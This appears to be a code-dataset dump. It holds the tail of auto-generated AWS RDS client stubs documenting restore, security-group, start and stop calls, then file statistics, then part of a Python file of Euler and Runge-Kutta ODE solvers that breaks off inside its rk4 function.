:param OptionGroupName: The name of the option group to be used for the restored DB instance.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the DB instance.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type TdeCredentialArn: string
:param TdeCredentialArn: The ARN from the Key Store with which to associate the instance for TDE encryption.
:type TdeCredentialPassword: string
:param TdeCredentialPassword: The password for the given ARN from the Key Store in order to access the device.
:type Domain: string
:param Domain: Specify the Active Directory Domain to restore the instance in.
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the restored DB instance to snapshots of the DB instance; otherwise false. The default is false.
:type DomainIAMRoleName: string
:param DomainIAMRoleName: Specify the name of the IAM role to be used when making API calls to the Directory Service.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Aurora 5.6 or higher.
Default: false
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def restore_db_instance_to_point_in_time(SourceDBInstanceIdentifier=None, TargetDBInstanceIdentifier=None, RestoreTime=None, UseLatestRestorableTime=None, DBInstanceClass=None, Port=None, AvailabilityZone=None, DBSubnetGroupName=None, MultiAZ=None, PubliclyAccessible=None, AutoMinorVersionUpgrade=None, LicenseModel=None, DBName=None, Engine=None, Iops=None, OptionGroupName=None, CopyTagsToSnapshot=None, Tags=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, Domain=None, DomainIAMRoleName=None, EnableIAMDatabaseAuthentication=None):
"""
Restores a DB instance to an arbitrary point in time. You can restore to any point in time before the time identified by the LatestRestorableTime property. You can restore to a point up to the number of days specified by the BackupRetentionPeriod property.
The target database is created with most of the original configuration, but in a system-selected availability zone, with the default security group, the default subnet group, and the default DB parameter group. By default, the new DB instance is created as a single-AZ deployment except when the instance is a SQL Server instance that has an option group that is associated with mirroring; in this case, the instance becomes a mirrored deployment and not a single-AZ deployment.
See also: AWS API Documentation
:example: response = client.restore_db_instance_to_point_in_time(
SourceDBInstanceIdentifier='string',
TargetDBInstanceIdentifier='string',
RestoreTime=datetime(2015, 1, 1),
UseLatestRestorableTime=True|False,
DBInstanceClass='string',
Port=123,
AvailabilityZone='string',
DBSubnetGroupName='string',
MultiAZ=True|False,
PubliclyAccessible=True|False,
AutoMinorVersionUpgrade=True|False,
LicenseModel='string',
DBName='string',
Engine='string',
Iops=123,
OptionGroupName='string',
CopyTagsToSnapshot=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
StorageType='string',
TdeCredentialArn='string',
TdeCredentialPassword='string',
Domain='string',
DomainIAMRoleName='string',
EnableIAMDatabaseAuthentication=True|False
)
:type SourceDBInstanceIdentifier: string
:param SourceDBInstanceIdentifier: [REQUIRED]
The identifier of the source DB instance from which to restore.
Constraints:
Must be the identifier of an existing database instance
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type TargetDBInstanceIdentifier: string
:param TargetDBInstanceIdentifier: [REQUIRED]
The name of the new database instance to be created.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type RestoreTime: datetime
:param RestoreTime: The date and time to restore from.
Valid Values: Value must be a time in Universal Coordinated Time (UTC) format
Constraints:
Must be before the latest restorable time for the DB instance
Cannot be specified if UseLatestRestorableTime parameter is true
Example: 2009-09-07T23:45:00Z
:type UseLatestRestorableTime: boolean
:param UseLatestRestorableTime: Specifies whether (true ) or not (false ) the DB instance is restored from the latest backup time.
Default: false
Constraints: Cannot be specified if RestoreTime parameter is provided.
:type DBInstanceClass: string
:param DBInstanceClass: The compute and memory capacity of the Amazon RDS DB instance.
Valid Values: db.t1.micro | db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
Default: The same DBInstanceClass as the original DB instance.
:type Port: integer
:param Port: The port number on which the database accepts connections.
Constraints: Value must be 1150-65535
Default: The same port as the original DB instance.
:type AvailabilityZone: string
:param AvailabilityZone: The EC2 Availability Zone that the database instance will be created in.
Default: A random, system-chosen Availability Zone.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true.
Example: us-east-1a
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The DB subnet group name to use for the new instance.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type MultiAZ: boolean
:param MultiAZ: Specifies if the DB instance is a Multi-AZ deployment.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true .
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
Default VPC: true
VPC: false
If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor version upgrades will be applied automatically to the DB instance during the maintenance window.
:type LicenseModel: string
:param LicenseModel: License model information for the restored DB instance.
Default: Same as source.
Valid values: license-included | bring-your-own-license | general-public-license
:type DBName: string
:param DBName: The database name for the restored DB instance.
Note
This parameter is not used for the MySQL or MariaDB engines.
:type Engine: string
:param Engine: The database engine to use for the new instance.
Default: The same as source
Constraint: Must be compatible with the engine of the source
Valid Values: MySQL | mariadb | oracle-se1 | oracle-se | oracle-ee | sqlserver-ee | sqlserver-se | sqlserver-ex | sqlserver-web | postgres | aurora
:type Iops: integer
:param Iops: The amount of Provisioned IOPS (input/output operations per second) to be initially allocated for the DB instance.
Constraints: Must be an integer greater than 1000.
SQL Server
Setting the IOPS value for the SQL Server database engine is not supported.
:type OptionGroupName: string
:param OptionGroupName: The name of the option group to be used for the restored DB instance.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the restored DB instance to snapshots of the DB instance; otherwise false. The default is false.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the DB instance.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type TdeCredentialArn: string
:param TdeCredentialArn: The ARN from the Key Store with which to associate the instance for TDE encryption.
:type TdeCredentialPassword: string
:param TdeCredentialPassword: The password for the given ARN from the Key Store in order to access the device.
:type Domain: string
:param Domain: Specify the Active Directory Domain to restore the instance in.
:type DomainIAMRoleName: string
:param DomainIAMRoleName: Specify the name of the IAM role to be used when making API calls to the Directory Service.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Aurora 5.6 or higher.
Default: false
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def revoke_db_security_group_ingress(DBSecurityGroupName=None, CIDRIP=None, EC2SecurityGroupName=None, EC2SecurityGroupId=None, EC2SecurityGroupOwnerId=None):
"""
Revokes ingress from a DBSecurityGroup for previously authorized IP ranges or EC2 or VPC Security Groups. Required parameters for this API are one of CIDRIP, EC2SecurityGroupId for VPC, or (EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId).
See also: AWS API Documentation
Examples
This example revokes ingress for the specified CIDR block associated with the specified DB security group.
Expected Output:
:example: response = client.revoke_db_security_group_ingress(
DBSecurityGroupName='string',
CIDRIP='string',
EC2SecurityGroupName='string',
EC2SecurityGroupId='string',
EC2SecurityGroupOwnerId='string'
)
:type DBSecurityGroupName: string
:param DBSecurityGroupName: [REQUIRED]
The name of the DB security group to revoke ingress from.
:type CIDRIP: string
:param CIDRIP: The IP range to revoke access from. Must be a valid CIDR range. If CIDRIP is specified, EC2SecurityGroupName , EC2SecurityGroupId and EC2SecurityGroupOwnerId cannot be provided.
:type EC2SecurityGroupName: string
:param EC2SecurityGroupName: The name of the EC2 security group to revoke access from. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:type EC2SecurityGroupId: string
:param EC2SecurityGroupId: The id of the EC2 security group to revoke access from. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:type EC2SecurityGroupOwnerId: string
:param EC2SecurityGroupOwnerId: The AWS Account Number of the owner of the EC2 security group specified in the EC2SecurityGroupName parameter. The AWS Access Key ID is not an acceptable value. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:rtype: dict
:return: {
'DBSecurityGroup': {
'OwnerId': 'string',
'DBSecurityGroupName': 'string',
'DBSecurityGroupDescription': 'string',
'VpcId': 'string',
'EC2SecurityGroups': [
{
'Status': 'string',
'EC2SecurityGroupName': 'string',
'EC2SecurityGroupId': 'string',
'EC2SecurityGroupOwnerId': 'string'
},
],
'IPRanges': [
{
'Status': 'string',
'CIDRIP': 'string'
},
],
'DBSecurityGroupArn': 'string'
}
}
:returns:
DescribeDBSecurityGroups
AuthorizeDBSecurityGroupIngress
CreateDBSecurityGroup
RevokeDBSecurityGroupIngress
"""
pass
def start_db_instance(DBInstanceIdentifier=None):
"""
Starts a DB instance that was stopped using the AWS console, the stop-db-instance AWS CLI command, or the StopDBInstance action. For more information, see Stopping and Starting a DB instance in the AWS RDS user guide.
See also: AWS API Documentation
:example: response = client.start_db_instance(
DBInstanceIdentifier='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The user-supplied instance identifier.
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
ModifyDBInstance
RebootDBInstance
RestoreDBInstanceFromDBSnapshot
RestoreDBInstanceToPointInTime
"""
pass
def stop_db_instance(DBInstanceIdentifier=None, DBSnapshotIdentifier=None):
"""
Stops a DB instance. When you stop a DB instance, Amazon RDS retains the DB instance's metadata, including its endpoint, DB parameter group, and option group membership. Amazon RDS also retains the transaction logs so you can do a point-in-time restore if necessary. For more information, see Stopping and Starting a DB instance in the AWS RDS user guide.
See also: AWS API Documentation
:example: response = client.stop_db_instance(
DBInstanceIdentifier='string',
DBSnapshotIdentifier='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The user-supplied instance identifier.
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: The user-supplied instance identifier of the DB Snapshot created immediately before the DB instance is stopped.
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
| 45.071266
| 949
| 0.616018
| 45,188
| 434,487
| 5.908339
| 0.034699
| 0.013147
| 0.007528
| 0.008529
| 0.85791
| 0.824377
| 0.792794
| 0.769902
| 0.746695
| 0.730128
| 0
| 0.013469
| 0.312198
| 434,487
| 9,639
| 950
| 45.075941
| 0.879936
| 0.881845
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.537234
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
dcb21bb3b3a56d7af3ac7b33111b74be4a94c1bd
| 7,081
|
py
|
Python
|
Lista6.py
|
EnzoItaliano/calculoNumericoEmPython
|
be3161b823955620be71e0f94a3421288fd28ef0
|
[
"MIT"
] | 1
|
2019-12-28T21:23:00.000Z
|
2019-12-28T21:23:00.000Z
|
Lista6.py
|
EnzoItaliano/calculoNumericoEmPython
|
be3161b823955620be71e0f94a3421288fd28ef0
|
[
"MIT"
] | null | null | null |
Lista6.py
|
EnzoItaliano/calculoNumericoEmPython
|
be3161b823955620be71e0f94a3421288fd28ef0
|
[
"MIT"
] | null | null | null |
import copy
import math
import numpy as np
from sympy import *
import plotly.graph_objects as go
from scipy.integrate import odeint
from prettytable import PrettyTable
x,y = symbols('x y')
def eulermethodf(f, a, b, x0, y0, n):
expr = lambdify([x, y], f)
h = (b - a) / n
listaX = [x0]
listaY = [y0]
listaErr = []
num = x0
for i in range(n):
num = num + h
listaX.append(num)
for i in range(n):
listaY.append(listaY[len(listaY)-1] + h*expr(listaX[i],listaY[len(listaY)-1]))
def g(y_0, xs):
return expr(xs,y_0)
w = odeint(g, y0,listaX)
for i in range(len(listaY)):
listaErr.append(abs(w[i][0] - listaY[i]))
Table = PrettyTable()
ks = []
i = 0
while(len(ks) < n + 1):
ks.append(i)
i+=1
Table.add_column("i", ks)
Table.add_column("X", listaX)
Table.add_column("Y", listaY)
Table.add_column("Erro", listaErr)
print(Table)
def graficoeuler(f, a, b, x0, y0, n):
expr = lambdify([x, y], f)
h = (b - a) / n
listaX = [x0]
listaY = [y0]
num = x0
for i in range(n):
num = num + h
listaX.append(num)
for i in range(n):
listaY.append(listaY[len(listaY)-1] + h*expr(listaX[i],listaY[len(listaY)-1]))
def g(y_0, xs):
return expr(xs,y_0)
z = np.arange(x0, listaX[len(listaX)-1]+0.001, 0.001)
w = odeint(g, y0, z)
c = []
for i in range(len(w)):
c.append(float(w[i]))
fig = go.Figure()
fig.add_trace(go.Scatter(x=z,y=c, name='Solução Exata'))
fig.add_trace(go.Scatter(x=listaX, y=listaY, name="Estimativa", mode="markers"))
fig.show()
def eulermethod(f, a, b, x0, y0, n):
expr = lambdify([x, y], f)
h = (b - a) / n
listaX = [x0]
listaY = [y0]
num = x0
for i in range(n):
num = num + h
listaX.append(num)
for i in range(n):
listaY.append(listaY[len(listaY)-1] + h*expr(listaX[i],listaY[len(listaY)-1]))
Table = PrettyTable()
ks = []
i = 0
while(len(ks) < n + 1):
ks.append(i)
i+=1
Table.add_column("i", ks)
Table.add_column("X", listaX)
Table.add_column("Y", listaY)
print(Table)
def rk2(f, a, b, x0, y0, n):
expr = lambdify([x, y], f)
h = (b - a) / n
listaX = [x0]
listaY = [y0]
listaK1 = []
listaK2 = []
listaErr = []
num = x0
for i in range(n):
num = num + h
listaX.append(num)
for i in range(n):
listaK1.append(expr(listaX[i], listaY[i]))
listaK2.append(expr(listaX[i] + h, listaY[i] + h*listaK1[i]))
listaY.append(listaY[len(listaY)-1] + (h/2) * (listaK1[len(listaK1)-1] + listaK2[len(listaK2)-1]))
listaK1.append("-")
listaK2.append("-")
def g(y_0, xs):
return expr(xs,y_0)
w = odeint(g, y0,listaX)
for i in range(len(listaY)):
listaErr.append(abs(w[i][0] - listaY[i]))
Table = PrettyTable()
ks = []
i = 0
while(len(ks) < n + 1):
ks.append(i)
i+=1
Table.add_column("i", ks)
Table.add_column("X", listaX)
Table.add_column("K1", listaK1)
Table.add_column("K2", listaK2)
Table.add_column("Y", listaY)
Table.add_column("Erro", listaErr)
print(Table)
def graficork2(f, a, b, x0, y0, n):
expr = lambdify([x, y], f)
h = (b - a) / n
listaX = [x0]
listaY = [y0]
listaK1 = []
listaK2 = []
num = x0
for i in range(n):
num = num + h
listaX.append(num)
for i in range(n):
listaK1.append(expr(listaX[i], listaY[i]))
listaK2.append(expr(listaX[i] + h, listaY[i] + h*listaK1[i]))
listaY.append(listaY[len(listaY)-1] + (h/2) * (listaK1[len(listaK1)-1] + listaK2[len(listaK2)-1]))
def g(y_0, xs):
return expr(xs,y_0)
z = np.arange(x0, listaX[len(listaX)-1]+0.001, 0.001)
w = odeint(g, y0, z)
c = []
for i in range(len(w)):
c.append(float(w[i]))
fig = go.Figure()
fig.add_trace(go.Scatter(x=z,y=c, name='Solução Exata'))
fig.add_trace(go.Scatter(x=listaX, y=listaY, name="Estimativa", mode="markers"))
fig.show()
def rk4(f, a, b, x0, y0, n):
expr = lambdify([x, y], f)
h = (b - a) / n
listaX = [x0]
listaY = [y0]
listaK1 = []
listaK2 = []
listaK3 = []
listaK4 = []
listaErr = []
